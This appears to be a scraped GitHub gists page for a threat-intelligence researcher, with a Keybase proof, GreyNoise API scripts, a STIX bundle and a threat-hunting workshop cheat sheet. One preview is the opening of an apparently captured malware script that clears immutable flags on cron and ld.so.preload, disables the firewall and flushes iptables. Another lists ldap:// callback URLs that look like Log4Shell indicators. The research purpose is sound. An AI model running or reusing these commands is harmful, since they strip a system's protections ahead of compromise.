I hereby claim:
- I am superducktoes on github.
- I am superducktoes (https://keybase.io/superducktoes) on keybase.
- I have a public key whose fingerprint is B2C5 91D5 AF7C C0B6 F068 7567 0517 E3C4 ED54 7340
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/bin/bash | |
ulimit -n 65535 | |
chattr -i /etc/ld.so.preload | |
rm -f /etc/ld.so.preload | |
chattr -R -i /var/spool/cron | |
chattr -i /etc/crontab | |
ufw disable | |
iptables -F |
ldap://e2216d7a9a31.bingsearchlib.com:39356/a | |
ldap://612877d3a59b.bingsearchlib.com:39356/a | |
ldap://205.185.115.217:47324/a | |
ldap://ab3419ba1f45.bingsearchlib.com:39356/a | |
ldap://193.3.19.159:53/c | |
ldap://ea62856c5fc3.bingsearchlib.com:39356/a | |
ldap://43065f484327.bingsearchlib.com:39356/a | |
ldap://5486b6edd688.bingsearchlib.com:39356/a | |
ldap://92d27039ede4.bingsearchlib.com:39356/a | |
ldap://45cecd2f38ca.bingsearchlib.com:39356/a |
import fileinput | |
import re | |
from greynoise import GreyNoise | |
# command usage: cat <file_ips>.txt| python3 file_ips_lookup.py | |
api_client = GreyNoise(api_key="") | |
ip_list = [] | |
# parse file for ips |
{ | |
"type": "bundle", | |
"id": "bundle--156aade4-a0b9-4931-aef7-f400b2ffd1d7", | |
"objects": [ | |
{ | |
"type": "indicator", | |
"spec_version": "2.1", | |
"id": "indicator--7f7cfee6-7cb4-4d8f-8012-bc5959a53564", | |
"created": "2022-05-19T20:10:17.632149Z", | |
"modified": "2022-05-19T20:10:17.632149Z", |
from greynoise import GreyNoise | |
import json | |
import csv | |
import argparse | |
import os | |
from stix2 import MemoryStore, Indicator | |
api_client = GreyNoise(api_key="") | |
parser = argparse.ArgumentParser() |
import requests | |
import json | |
GN_API_KEY = "" | |
GN_QUERY = "last_seen:1d classification:malicious" | |
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql" | |
HEADERS = { | |
"accept": "application/json", |
Stop Chasing Ghosts: California Roadshow | |
Cheat Sheet | |
You’re working at a sticker company called “Milk Co.” One of your developers leaves a vulnerable dev environment exposed to the internet. Users at the workshop will play the role of the Security Analyst at “Milk Co.” and have to investigate the alert to understand what happened, decide how they can stop additional attacks quickly, and then do additional investigation into indicators that can be used for hunting. | |
Question Answer Form | |
https://stopchasingghosts.typeform.com/to/JWKos6K2 | |
[Optional] Slack Channel: Join GreyNoise Community Slack and find channel #roadshow-dc |
import requests | |
import sys | |
api_key = "" | |
limit = 10 # can change for more | |
if(len(sys.argv) < 2): | |
print("need an IP") | |
quit() | |
headers = { |
import matplotlib.pyplot as plt | |
import numpy as np | |
import requests | |
import json | |
GN_API_KEY = "" | |
GN_QUERY = 'jira last_seen:30d' | |
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql" | |
HEADERS = { |